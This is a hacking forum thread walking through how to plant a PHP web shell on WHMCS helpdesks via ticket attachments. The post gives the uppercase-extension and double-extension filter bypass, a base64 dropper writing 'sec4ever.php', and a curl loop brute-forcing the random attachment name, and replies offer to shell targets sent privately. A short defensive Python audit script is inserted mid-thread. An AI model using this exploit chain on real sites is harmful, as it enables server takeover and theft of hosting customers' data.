MaDLeeTs • Cyber Security & Professional Webmasters Forum

Full Version: WHMCS 3rd TricK wIth MiMe TyPe And PHP Ext ByPass
Hello Brothers

How are You ?

Today We've 3rd WHMCS Trick - Uploading Shell On WHMCS Via Attachments

At First , Let's Talk About Mime Types

These Are Extensions

Code:
gif,png,rar,zip,php,asp,aspx

Apache Uses The Extension To Run The File As Its Extension

For Example If You Upload File As This : b0x.gif

Apache Will run it As Picture/Image

And If You Do it As This : b0x.php

The File will Be Run as PHP File

Okay ... In Apache There Are Many Extensions That Are Not Defined, Like rar

So Let's Start in WHMCS go to submit new ticket

Code:
http://site.tld/whmcs/submitticket.php

You'll See This

[Image: WOR61514.png]
So Here The Attachments We've Prospect'z

I : The Extension PHP Is allowed To Be Uploaded

But When We Try 2 Upload PHP File We'll Have This result

[Image: AKQ64896.png]

To Bypass This Problem ,, Just You've To Change Extension From Small php To Capital PHP Like This

Code:
b0x.PHP

The Changing In Extension Will Be Via Tamper Data

[Image: oDZ62191.png]

Then Submit it

[Image: wh162273.png]

Our Ticket Is ready Now .. So We Uploaded PHP

This Was Our 1st Prospect

II : PHP Extension Is not Allowed To Be uploaded on WHMCS

So We'll Use Non-Defined Extension in Apache

Like " rar " So We'll Use Tamper Data Too

[Image: tSi62460.png]

We'll Upload As This "b0x.PHP.rar"

Don't Forget Capital Letters

Then We'll Have This

[Image: hlj62514.png]

File Uploaded Successfully

But In WHMCS ,, When You Use Attachment or upload One

The File Will Automatically Be Renamed To Be Like This

Code:
number_filename.extension

For Example Our File b0x.PHP Will Be Like This

Code:
RandomNumber_b0x.PHP

We'll Not be Able To Know The Numbers Because it Uses Random Number So We've To Try Numbers

Before That .. Let's Make Small Summary

This Code Must be As Attach File

PHP Code:
<?php
$shellcode = "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";
$b0x = fopen("sec4ever.php", "w");
fwrite($b0x, base64_decode($shellcode));
?>

This Uploader Script Will be Opened In The Same Folder - attachments -
Now Upload it as Before Via .PHP or non-defined

After That ,, Use This Code To Generate / Browse Site And get Uploader in sec4ever.php

PHP Code:
<?
error_reporting(0);
$url = "http://domain.tld/whmcs/";
$attachfolder = "attachments";
$attach = "b0x.PHP";
for ($b0x = 100000; $b0x < 1000000; $b0x++) {
    $urls = "$url/$attachfolder/$b0x";
    $urls .= "_$attach";
    $ch = @curl_init();
    @curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    @curl_setopt($ch, CURLOPT_URL, $urls);
    $result = @curl_exec($ch);
    @curl_close($ch);
}
?>

Edit The Variables To Get The Correct Result - 3xPecteD

Then When The Script Ends Browsing URL'z Via Auto-Generate By For Function

The Script Will Browse Your PHP Code But You'll Not Be Able To Know What is the Number !

But The Script Will Generate Shell/Uploader in Sec4ever.php

[Image: q8O63187.png]

Greet'z
I-Hmx
Sec4ever
MadLeets
Shadow008
1337
H4x0rL1f3
Dr.Zombie
KhantastiC
X-Shadow




Thanks 4 All
./b0x
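
Added example (not part of the original post and not WHMCS code): a defender-side audit of stored attachment names for the two conditions the post relies on, a case-sensitive extension blocklist and a script extension sitting in front of a final one. The extension lists, function names and sample directory listing are assumptions constructed for this example.

```python
import re

# Assumed: extensions a server maps to a script handler; adjust to the real config.
HANDLER_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "cgi", "pl"}
# Assumed policy: final extensions the helpdesk is meant to accept.
ALLOWED_FINAL = {"gif", "png", "jpg", "jpeg", "pdf", "txt", "zip"}
# Stored attachment names follow number_filename.extension, as the post describes.
STORED_NAME = re.compile(r"^(\d+)_(.+)$")


def check_attachment(stored_name):
    """Return the reasons a stored name is unsafe; an empty list means it passed."""
    m = STORED_NAME.match(stored_name)
    original = m.group(2) if m else stored_name
    # Apache mod_mime (AddHandler/AddType) matches extensions case-insensitively and
    # looks at every dot-separated extension, so lower-case and check them all.
    exts = [p for p in original.lower().split(".")[1:] if p]
    if not exts:
        return ["no extension"]
    reasons = []
    hits = [e for e in exts if e in HANDLER_EXTS]
    if hits:
        reasons.append("script extension present: " + ",".join(hits))
        if original != original.lower():
            reasons.append("mixed case would pass a case-sensitive blocklist")
    if exts[-1] not in ALLOWED_FINAL:
        reasons.append("final extension not on allowlist: " + exts[-1])
    return reasons


def audit(names):
    """Map each flagged stored name to its list of reasons."""
    report = {}
    for n in names:
        reasons = check_attachment(n)
        if reasons:
            report[n] = reasons
    return report


# Constructed sample listing of an attachments directory (not real data).
SAMPLE = ["482913_invoice.pdf", "731204_b0x.PHP", "650112_b0x.PHP.rar",
          "119845_up.PHP.gif", "904377_logo.PNG", "300001_notes"]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE).items():
        print(name, "->", "; ".join(reasons))
```

The same normalise-then-allowlist check belongs at upload time, and the attachments directory should sit outside the web root or have script handlers disabled for it.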





Finally it's out
hahahah UnderTaker u rock
awesome trick buddy
wut an idea sir G =)))

RocKxx xD
Great
awesome trick, keep up the good work
Not Working ...
u cant upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not execute...
(10-01-2012, 12:56 AM)b13-u Wrote: [ -> ]Not Working ...
u cant upload file like this
up.PHP
RandNumber_up.PHP
it is not allowed in whmcs u have to upload like this
up.PHP.gif
RandNumber_up.PHP.gif
the php file will not execute...
lols, if this was not working we wouldn't have posted, not everything here u see is visible to 1,2,3,4,5,6 steps even all his easy you are just unable to do it.
This works 100 percent and we did it also.
Regard's
hey mad'z

thx 4 posting
Code:
lols, if this was not working we wouldnt have posted, not everything  here u see is visible to 1,2,3,4,5,6 steps even all his easy you are  just unable to do it.
This works 100 percent and we did it also.
Regard's

We'll Kill him =)))

Mr b13-u

Send Me in Priv8 Message Site To upload Shell
And Check the Version ,, We Executed on the Last one 5.1
how do u expect this
fwrite($b0x,base64_decode($shellcode));
to work while server is not handling it as php ?
anyway i sent u the target i also tried on many others

thankx